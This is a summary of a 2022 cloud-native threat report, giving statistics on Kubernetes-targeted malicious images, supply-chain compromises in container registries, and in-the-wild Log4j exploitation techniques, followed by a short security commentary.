2022 Cloud‑Native Threat Report: Key Findings on Kubernetes Attacks, Supply‑Chain Risks, and Log4j Exploits

Overview: To defend cloud‑native environments against network threats, it is essential to understand attackers' vectors, strategies, techniques, and procedures. The 2022 Cloud‑Native Threat Report: Tracking Software Supply Chains and Kubernetes Attacks presents observations from 2021, highlighting new threats to the cloud‑native stack and key trends for security practitioners.

Finding 1 – Increased Frequency and Variety of Kubernetes Attacks: Attackers have shifted focus from Docker to Kubernetes and CI/CD pipelines, expanding targets to vulnerable Kubernetes deployments and applications. The proportion of malicious images aimed at Kubernetes environments rose from 9% in 2020 to 19% in 2021, a 10‑percentage‑point increase.

Attacks have also become more sophisticated: in 2021, 54% of incidents involved backdoor malware (up 9 pp from 2020), worm usage grew to 51% (up 10 pp), and activities involving rootkits, file‑less execution, and kernel‑module loading were observed.

Finding 2 – Supply‑Chain Attacks Remain Effective: Supply‑chain compromises accounted for 14.3% of malicious activity in public image registries, confirming their continued potency. Analysis of over 1,100 container images uploaded to the world’s largest registry showed 13% of attacks were linked to hidden malicious applications such as cryptocurrency miners, with 1.3% directly tied to malware.

Finding 3 – Active Exploitation of the Log4j Zero‑Day: The widely used logging library Log4j, with over 100 million global instances, has been leveraged in the wild through various malicious techniques, including known malware, file‑less execution, reverse shells, and in‑memory download‑and‑execute payloads.

Commentary: "Attackers are more active than ever, targeting cloud‑native technologies and exploiting vulnerabilities in applications, open‑source components, and cloud platforms. Security teams, developers, and DevOps must adopt solutions designed specifically for cloud‑native environments, implementing proactive and preventive measures to protect these systems."

Takeaway for 2022: Understanding these attack trends is critical for safeguarding cloud‑native workloads.